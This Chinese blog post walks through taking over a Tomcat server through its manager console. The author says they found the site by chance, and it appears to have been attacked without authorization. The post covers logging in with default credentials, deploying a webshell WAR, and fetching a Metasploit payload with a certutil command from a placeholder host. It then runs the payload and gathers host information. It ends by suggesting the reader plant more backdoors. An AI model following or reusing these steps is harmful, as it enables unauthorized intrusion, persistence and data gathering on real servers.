当前位置:首页 > Web安全 > 正文内容

浅析:TomCat Getshell拿服务器权限实战

UzJu3年前 (2022-04-17)Web安全3914

浅析:TomCat Getshell拿服务器权限实战

0xOO前言

无意中接触到一个网站 所以索性尝试一下

没什么技术性 都是一些基本操作 大佬看看就可以了奥

注:由于保密问题 所有关于对方信息网址等各项信息都将保密打上马赛克 能打的都打上马赛克

41f4a36c979d9808d9f058dfff5ff56b.jfif

0x00

tomcat默认有个manager的管理后台app,密码存放在conf/tomcat-users.xml里面。如果tomcat是外网开放的,那么这个manager服务也是开放的,http://主机:端口/manager/html 可以看看是不是通的

0x01

b60b9237b1dd09bdcd37b217fbafda95.jfif

首先我尝试一下默认账号admin 密码为空 发现可以进去 那真是太好了

5def55a86c3bd2c82a16ba921a6b87e7.jfif

2c4d110a175472d7c0d6fd7ec1fbbf4d.jfif

登录进去之后

107f154f5f07abc3748a97cdc36486ba.jfif

可以看到有一个上传war部署项目的

909ed859bc1becf92361c7eb2f17b25c.jfif

那么就用IDEA 打包一个webshell大马 部署进去即可

首先需要一个自备的webshell大马

158ebc6cbc6281c319b1eb96149e6379.jfif

随便找一个

然后打开IDEA创建一个项目

34c403b7f19258b01f1f087945828ee4.jfif

73e3832d98a4f40c074377bff4f65c78.jfif

一直Next即可

然后把webshell拷贝到scr目录

91911732b001a021e7578617d78aaa01.jfif

选择Project Structure

626b88d8218eaf4b7cee17db7fd8733b.jfif

选择Artifacts 然后再选择web Application: Archive

b496ea2d4ad6ef760a8f3075d934587a.jfif

d340c57a0362b707f70ef23a7ee5e3a3.jfif

打勾include in project build 然后点击+号选择module Output

dcb337b626e5d0622ffdaa361df60a4a.jfif

选择项目即可

3bb582d957d1b943cede8651e95e7985.jfif

然后选择build

b03b2e0632a56b068b05b52b721e02cc.jfif

选择build Artifacts

c17d8411cca4d4de0eb68984ebf644a0.jfif

d0bcb3c4049e74bc3fb92397d0910f79.jfif

完事之后呢

上传部署即可

2521ceba26a0ceae92ec1b20a249ad41.jfif

点击Deploy之后就可以看到

62027115cd92ab66792dc5ee07cb90f5.jfif

多了一个xssx

那么访问那个目录即可

9e6ae9c0417d78f2e26268dd21bfad74.jfif

526d8140d58d2c9c552006b94e543ab0.jfif

命令执行 ipconfig

可以看到内网 192.168.0.128

Net user

bc9e995c29e501fb0e6be8c5ea1d13c3.jfif

0x02

权限移交MetaSploit(Msf)

尝试使用shellcode制作payload

aac728351ecc43f8e12ee880199abc2b.jfif

3a7974e8335c38d170044dd90f6b754c.jfif

675c875939adab70a447f9ccb91b5104.jfif

编译后利用webshell上传到服务器

有最快捷的方法把payload上传到服务器( 记得一定要内网穿透哦 )

  1. 第一种就是使用CMD的命令certutil(然后使用CMD命令运行即可)

命令:certutil -urlcache -split -f https://www.xxx.com/test.EXE

2.第二种就是使用webshell的上传(同理,使用CMD命令运行PAYLOAD)

b1b213b89be92f2d8bdd38be37b6b344.jfif

首先使用webshell来到服务器的C:\\Windows\\System32\\目录下,然后uploadfile

77fb32f705bd0b699327b14743ec3103.jfif

Jie.exe就是我们上传的payload

那么直接使用CMD命令运行(命令:start C:\Windows\System32\jie.exe)

997bc22198f379e2b8fd65b408bcefed.jfif

12cb557c05bcb1c193467fcc11bec00f.jfif

内网的IP为192.168.0.128

40631909ceea7b50133311648df5b6c1.jfif

0x03

信息收集

1.查看路由

dbb3080d93e669e78669920ae545b9eb.jfif

2.查看系统信息

14700b11fc20c6cfe731a2b42418da5b.jfif

3.进入CMD命令行 然后Net User查看用户

215cde3fc3956bae8cd4745b053c9dff.jfif

4.调用post/windows/gather/dumplinks 来查看最近访问的文件

c64067a5833b066e582f0f964b74f64d.jfif

5.调用post/windows/gather/enum_applications 来查看目标主机安装软件的信息

87ea03e97f5ab44db88177609faa78de.jfif

然后可以选择多放几个后门 或者 提交漏洞!

请在国庆期间做一个好人

570da84fb8943e875ed255a79e6a63c4.jfif

bf07d1c19052e077b368e3874b8a4c76.jfif

扫描二维码推送至手机访问。

版权声明:本文由UzJu的安全屋发布,如需转载请注明出处。

SQL ERROR: ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'

本文链接:https://uzzju.com/post/56.java

分享给朋友:

相关文章

从SQL注入延时盲注到Get Database

从SQL注入延时盲注到Get Database

从SQL注入延时盲注到Get Database一、IAST发现 执行的SQL语句 SELECT COUNT(1) FROM t_ad WHERE (a`openrasp = ? AND delete_flag = ? AND ad_...

【渗透测试】记一次智慧校园系统一轮游

【渗透测试】记一次智慧校园系统一轮游

记一次智慧校园系统一轮游记一次智慧校园系统一轮游一、前言如发现存在问题发送邮件到:UzJuer@163.com删除文章 关于如何挖逻辑漏洞的思维图 二、智慧校园系统1、www.xxx-xxxx.com svn泄露Ps:后...

某次授权渗透测试小记

某次授权渗透测试小记

某次授权渗透测试小记一、某次授权渗透测试部分小记本文已得到授权 如发现存在问题发送邮件到:UzJuer@163.com删除文章 1、帝国CMS 后台GETSHELL图书馆的一个系统,为开源CMS修改的,然后通过版本探测与其他的...

Redis常见利用方法

Redis常见利用方法

Redis常见利用方法 Redis简介与学习Redis常见端口 6379 Redis是现在最受欢迎的NoSQL数据库之一,Redis是一个使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数据...

两个简单的前端加密逆向

两个简单的前端加密逆向

前言两个站点都是比较简单的前端加密,也都是朋友喊来练练手的,不过Trace这款工具还是不错的吧 推荐一下六边形战士的Github工具:https://github.com/CC11001100/ast-hook-for-js-RE...

未授权与垂直/水平越权(IDOR)检测实现方案

未授权与垂直/水平越权(IDOR)检测实现方案

未授权与垂直/水平越权(IDOR)检测实现方案TODO1、去重通过接口进行去重 防止水平越权时参数不一致导致的同一个URL重复问题 2、黑名单配置 让用户选择可以配置黑名单来禁止检测指定URL 3、白名单配置 让用户选...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。